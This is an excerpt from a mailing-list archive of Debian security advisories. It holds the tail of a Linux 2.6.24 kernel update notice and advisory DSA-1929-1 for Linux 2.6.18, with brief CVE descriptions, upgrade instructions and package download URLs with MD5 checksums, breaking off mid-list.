    Size/MD5 checksum:   358770 0778828f3b2061e293f3aabc0aa78315
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch1_i386.deb
    Size/MD5 checksum:   358342 3c8b34971bd6f2b69854328888aa4349
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch1_i386.deb
    Size/MD5 checksum: 19146708 1818f00a12bc38f393e6d84f71afae73
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.9etch1_i386.deb
    Size/MD5 checksum:    82890 318cd7ef9d8b39d02da83a3a982f7c40
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch1_i386.deb
    Size/MD5 checksum: 19481866 bb86c9b5a4944b48492a38f81ea38026
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch1_i386.deb
    Size/MD5 checksum:  3655456 fb818a8696c619e5c9c7af73eec2b3c3
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch1_i386.deb
    Size/MD5 checksum:   358104 388750612fda29fb362771823e54993c
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch1_i386.deb
    Size/MD5 checksum: 19213920 bc5f6ef45349d25064125c5c34e78fde
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch1_i386.deb
    Size/MD5 checksum: 19215890 868b1eb9c46677d9d97d0678b4a21894
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch1_i386.deb
    Size/MD5 checksum:   346092 1874a566f494c8fa93946f7cdf71557f
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch1_i386.deb
    Size/MD5 checksum:    82864 321874f0f13b6e236c428568a492cb90

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch1_ia64.deb
    Size/MD5 checksum:    82866 410b7f438b9b8468e3789058dcb31d63
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch1_ia64.deb
    Size/MD5 checksum: 32208224 154e3adb6765a43a000dcb9f9256db56
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch1_ia64.deb
    Size/MD5 checksum:  3568326 aa15646940c12e9f722d3668cca00270
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.9etch1_ia64.deb
    Size/MD5 checksum:    82888 31354bcffa90ddfd3dd3905f37b53685
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch1_ia64.deb
    Size/MD5 checksum:   319102 7e62e5eadf5b3b8eecc22ccdfa57b19a
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch1_ia64.deb
    Size/MD5 checksum:   319462 44040aba13eedc65922aa25a05fc8b86
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch1_ia64.deb
    Size/MD5 checksum: 32025040 474e2842ef8f69677380db67882b0fb0

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch1_mipsel.deb
    Size/MD5 checksum: 13317670 61df26ad246695fad18f2f76c3c5163f
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch1_mipsel.deb
    Size/MD5 checksum:  3804192 393d33cc947f3e091c5858ef9179a70a
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch1_mipsel.deb
    Size/MD5 checksum:   308984 157b8af3aa5634f7a516cdf5cc220836
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch1_mipsel.deb
    Size/MD5 checksum:   309750 d7ff28e982746494de3626cd747287c5
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch1_mipsel.deb
    Size/MD5 checksum: 21737172 78c5c433465bc97c6c16a49fea05b575
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch1_mipsel.deb
    Size/MD5 checksum:   246818 884f377e13d22f6633a49d4c0367f848
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch1_mipsel.deb
    Size/MD5 checksum:    82870 cacc5fac473c021a7e0c0f7103e1efc0
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch1_mipsel.deb
    Size/MD5 checksum:   246614 31c1c45fab75abb6221285c152b23cfd
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch1_mipsel.deb
    Size/MD5 checksum: 16567458 f1da961b02a1c60672349c1a9c19c9d1
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.9etch1_mipsel.deb
    Size/MD5 checksum:    82916 4b4d12b65b14c90ac9dda0c6303f9f5c
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch1_mipsel.deb
    Size/MD5 checksum: 16631254 b956adbf57f77bc34f06ca58d0d6a73f
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch1_mipsel.deb
    Size/MD5 checksum: 26990038 bd115b24191672415033fb0d077e33e8
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch1_mipsel.deb
    Size/MD5 checksum:   247676 99d036e308655b4fb11d460fd50c4dd1

  These changes will probably be included in the oldstable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iD8DBQFK80tBhuANDBmkLRkRAj8vAJ9fKUFHKAQOSNoUzwbDY1ep4gqF0wCfcyxM
YnZRXAn8UGyZzqSA660Vm/o=
=Ey4e
-----END PGP SIGNATURE-----


From dannf at debian.org  Fri Nov  6 00:51:43 2009
From: dannf at debian.org (dann frazier)
Date: Thu, 5 Nov 2009 17:51:43 -0700
Subject: [Full-disclosure] [SECURITY] [DSA 1929-1] New Linux 2.6.18 packages
	fix several vulnerabilities
Message-ID: <20091106005143.GH19388@ldl.fc.hp.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ----------------------------------------------------------------------
Debian Security Advisory DSA-1929-1                security at debian.org
http://www.debian.org/security/                           Dann Frazier
November 5, 2009                    http://www.debian.org/security/faq
- ----------------------------------------------------------------------

Package        : linux-2.6
Vulnerability  : privilege escalation/denial of service/sensitive memory leak
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2009-1883 CVE-2009-2909 CVE-2009-3001 CVE-2009-3002
                 CVE-2009-3228 CVE-2009-3238 CVE-2009-3286 CVE-2009-3547
                 CVE-2009-3612 CVE-2009-3621

Several vulnerabilities have been discovered in the Linux kernel that
may lead to a denial of service, sensitive memory leak or privilege
escalation.  The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2009-1883

    Solar Designer discovered a missing capability check in the
    z90crypt driver or s390 systems. This vulnerability may allow
    a local user to gain elevated privileges.

CVE-2009-2909

    Arjan van de Ven discovered an issue in the AX.25 protocol
    implementation. A specially crafted call to setsockopt() can
    result in a denial of service (kernel oops).

CVE-2009-3001

    Jiri Slaby fixed a sensitive memory leak issue in the ANSI/IEEE
    802.2 LLC implementation. This is not exploitable in the Debian
    lenny kernel as root privileges are required to exploit this
    issue.

CVE-2009-3002

    Eric Dumazet fixed several sensitive memory leaks in the IrDA,
    X.25 PLP (Rose), NET/ROM, Acorn Econet/AUN, and Controller Area
    Network (CAN) implementations. Local users can exploit these
    issues to gain access to kernel memory.

CVE-2009-3228

    Eric Dumazet reported an instance of uninitialized kernel memory
    in the network packet scheduler. Local users may be able to
    exploit this issue to read the contents of sensitive kernel
    memory.
  
CVE-2009-3238

    Linus Torvalds provided a change to the get_random_int() function
    to increase its randomness.

CVE-2009-3286

    Eric Paris discovered an issue with the NFSv4 server
    implementation.  When an O_EXCL create fails, files may be left
    with corrupted permissions, possibly granting unintentional
    privileges to other local users.

CVE-2009-3547

    Earl Chew discovered a NULL pointer dereference issue in the
    pipe_rdwr_open function which can be used by local users to gain
    elevated privileges.

CVE-2009-3612

    Jiri Pirko discovered a typo in the initialization of a structure
    in the netlink subsystem that may allow local users to gain access
    to sensitive kernel memory.

CVE-2009-3621

    Tomoki Sekiyama discovered a deadlock condition in the UNIX domain
    socket implementation. Local users can exploit this vulnerability
    to cause a denial of service (system hang).

For the oldstable distribution (etch), this problem has been fixed in
version 2.6.18.dfsg.1-26etch1.

We recommend that you upgrade your linux-2.6, fai-kernels, and
user-mode-linux packages.

Note: Debian 'etch' includes linux kernel packages based upon both the
2.6.18 and 2.6.24 linux releases.  All known security issues are
carefully tracked against both packages and both packages will receive
security updates until security support for Debian 'etch'
concludes. However, given the high frequency at which low-severity
security issues are discovered in the kernel and the resource
requirements of doing an update, lower severity 2.6.18 and 2.6.24
updates will typically release in a staggered or "leap-frog" fashion.

The following matrix lists additional source packages that were rebuilt for
compatability with or to take advantage of this update:

                                             Debian 4.0 (etch)
     fai-kernels                             1.17+etch.26etch1
     user-mode-linux                         2.6.18-1um-2etch.26etch1

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Oldstable updates are available for alpha, amd64, hppa, i386,
ia64, powerpc and s390 architectures. Updates for other
architectures will be released as the they become available.

Source archives:

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-26etch1.diff.gz
    Size/MD5 checksum:  5514957 b9cb3b1e1ba1196b9020e6d07d48b752
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-26etch1.dsc
    Size/MD5 checksum:     5673 4ba2595893287a7b82713ca182aad7be
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz
    Size/MD5 checksum: 52225460 6a1ab0948d6b5b453ea0fce0fcc29060

Architecture independent packages:

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-6_2.6.18.dfsg.1-26etch1_all.deb
    Size/MD5 checksum:  3721660 836e780dd306ee60318d8ac1c28087eb
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-26etch1_all.deb
    Size/MD5 checksum: 41474520 7457b0e444adb6b31dbcda82768671cd
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-26etch1_all.deb
    Size/MD5 checksum:  1852976 ec11d9e2967a87b27fac807f80218d0e
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-26etch1_all.deb
    Size/MD5 checksum:    58896 e7dc19b1c3f0a22c1764420642117fa8
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-26etch1_all.deb
    Size/MD5 checksum:  3593482 146e26a9c17bfa1a0a1fa198afdf1c70
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-26etch1_all.deb
    Size/MD5 checksum:  1091166 7a089920e547412d07cf1ef44e47bbb1

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-alpha_2.6.18.dfsg.1-26etch1_alpha.deb
    Size/MD5 checksum:    58290 7a1661641c432bc5a1e442a71f0584ac
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch1_alpha.deb
    Size/MD5 checksum:    58254 223e25b49b1ce3fefe9934ecdda7cec4
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-26etch1_alpha.deb
    Size/MD5 checksum: 23374558 fc6fad80b66536f0c86fe4a4923057fa
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-generic_2.6.18.dfsg.1-26etch1_alpha.deb
    Size/MD5 checksum:   266914 bd1cb44848eb7ed46418783e958046de
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-26etch1_alpha.deb
    Size/MD5 checksum:   267502 b719376ff7b69b31e59f49010c249d17
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-26etch1_alpha.deb
    Size/MD5 checksum: 23440762 aace7bef32f7f7f69e1aeed69d191c41
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-smp_2.6.18.dfsg.1-26etch1_alpha.deb
    Size/MD5 checksum:   266308 228979a449e897802d4089909eef0326
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch1_alpha.deb
    Size/MD5 checksum:  2978226 214923bbb5171e2a3daa23ed31240118
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-26etch1_alpha.deb
    Size/MD5 checksum:   267100 60048c2f207f0b00b1fab86639f3c276
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-generic_2.6.18.dfsg.1-26etch1_alpha.deb
    Size/MD5 checksum: 23393346 1fcae90244756e9b1ed37b08a8e39b99
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-smp_2.6.18.dfsg.1-26etch1_alpha.deb
    Size/MD5 checksum: 23752762 c6b5c665617a937c6caee0558daa8b2d
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch1_alpha.deb
    Size/MD5 checksum:  3001856 cb672b346cd9b30717e4446ee2545fff

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum:  3339600 83ef8191115cf0c23599b2ad45da661c
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum: 15279100 dba0ecedc142a8f29c08ff3cb35fc9e5
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum:  3362362 7acf6afbec42d7e386e4e99f45e07849
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum: 16822140 04e89e226683aee6fc0f5e2d2751e258
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum:   277136 04ba98f1750e31f17a52caa0add3e419
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum:  3196356 37e16a42ebf900a63d15ec1c47bd2a2a
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-amd64_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum: 15266172 647285195e9651e86fc78f47ca3e6aa3
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum:  1687964 2556db55e5438dc01309d7d461f91ee3
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum:  3173540 5e0fd0af39da8904a5fc459e00fe1592
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-amd64_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum:   276536 ac228fd76c2a64910f1194c39f5dd9a5
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum:   274660 9817c928baacf675542085e0387cfedc
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum: 16868682 d99a5ffc0a0c88dee5f8c279e3f96f64
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-amd64_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum:    58278 4825706649861dcc9afd8438f961ec6e
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-amd64_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum:  1656646 633e8373c64bb27bc283e87300ebe6cf
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum:   276056 60aec7d94ae1a1afa21cc68d5b7d3c53
  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum:    58254 8bb6069f2f74da9b2bb5603898dc22e3
  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-amd64_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum:    58240 51d240b42f43c2cb30c31f5c4bf2117c
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch1_amd64.deb
    Size/MD5 checksum:    58254 31e336851095fea2499e594987acea4b

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc_2.6.18.dfsg.1-26etch1_hppa.deb
    Size/MD5 checksum: 10563254 4486c3660f904e4bd439c370b7f97c69
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-26etch1_hppa.deb
    Size/MD5 checksum: 11814740 f178d4aa3358d09a492436d29dbee5cb
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc-smp_2.6.18.dfsg.1-26etch1_hppa.deb
    Size/MD5 checksum:   202308 42a4b6b6b9c2f711d4c3b932353457fb
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64_2.6.18.dfsg.1-26etch1_hppa.deb
    Size/MD5 checksum: 11404596 9bd75cb26f23cc0c012dbcc1458c547f
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc-smp_2.6.18.dfsg.1-26etch1_hppa.deb
    Size/MD5 checksum: 11005460 01d3a246f1ffe6f368fa6ca9f4548e97
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch1_hppa.deb
    Size/MD5 checksum:  3026810 ef214434dcb13fe3bdd684bf580a6b9b
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-26etch1_hppa.deb
    Size/MD5 checksum:   203070 d50c921e10f3dd82ff85287acaf0b14f
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc_2.6.18.dfsg.1-26etch1_hppa.deb
    Size/MD5 checksum:   201556 da0a211d54dcd3e34fa29514c9934f9d
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-hppa_2.6.18.dfsg.1-26etch1_hppa.deb
    Size/MD5 checksum:    58368 9917c0b22afe4c440ec64ff6d2a608e4
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64_2.6.18.dfsg.1-26etch1_hppa.deb
    Size/MD5 checksum:   201912 163590408b3e663b5f8cfae14e3c89a5
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch1_hppa.deb
    Size/MD5 checksum:    58338 58f6a43a14a89d67bb46c796e8bde247

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686-bigmem_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:   290694 8a08177d6d4f46a20086b489ce4decf2
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:   280544 0ffbb9bc4aee76a067cebcec6f31f62e
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-686_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:   287894 831999c67686f31d2346b0fa6b4948aa
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686-bigmem_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum: 16543512 c0b9fdc137151b96ccb8198fab8b5f72
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum: 16931792 b73f3867a2efef757fcd111916116105
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum: 14401768 eb0e34a9dfc17344c471b158faeab021
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-i386_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:    58386 9ef707bff12f1cdb495a075c13325564
  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-686_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:    58324 a00b5e3696278aa2d9c59f16267e3d06
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-486_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum: 16326580 3ad3c0068e6343b6e5f70f3c44fdb3d5
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-k7_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:   289228 4fcd19b2eb92b4550dc4a7673acc4f62
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-k7_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum: 16645286 1b2290466641e1d9ef3ecf942180fe79
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:  3215828 0c99ba0dd4abce66cda2fe6c554ccc03
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-686_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum: 16517286 a729d0b07130c615d0d32d7b2ac46852
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:   289284 183af751e23717e0ac5821f60959e5ad
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-686_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum: 14392520 cc51caf6cedda77521b7ee9065478392
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-k7_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:   288014 c4834561b492ff42175353c524e0cbd1
  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:    58340 7c463341e612b3159e0032aaf62ab5e1
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum: 16477446 5829e6f2dce15ae1f3f74ca4d4180847
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-486_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:   291792 74558945d364674729b71b4d2598d1c8
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-686_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:  1304666 d9f7fb52fe8d29a9880ebc697eaae90f
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:  3239372 a7e8ba983a1e45176d33b86871e3940e
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:  3117812 36cc1af70a13016e79224a3f90981ac8
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:  1332688 a1c7f6d7435eaeb22c4e7097611602e5
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:   278926 cf2ec90e9c683c7c5904e76145b2b562
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:  3231506 8e9ff0b708e2e616072f569f0682fa11
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-k7_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum: 16604666 4d7eb157fa109072d21ec472bbbb46f1
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-686_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:   280110 d34163dab810a30572c7c1a29b9efdb6
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch1_i386.deb
    Size/MD5 checksum:    58326 bd8f5323a48ba297f6f404a4f26fd864

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch1_ia64.deb
    Size/MD5 checksum:    58254 d64ce41c696ae0af6e65348111b0e1c2
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-ia64_2.6.18.dfsg.1-26etch1_ia64.deb
    Size/MD5 checksum:    58276 509dcd2833bd560ed6dccffc0a448593
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-mckinley_2.6.18.dfsg.1-26etch1_ia64.deb
    Size/MD5 checksum:   259696 9e187526ddd2342af180682ab502f302
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-itanium_2.6.18.dfsg.1-26etch1_ia64.deb
    Size/MD5 checksum:   259718 b670f97d9bd044492111b7698ed228c3
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-itanium_2.6.18.dfsg.1-26etch1_ia64.deb
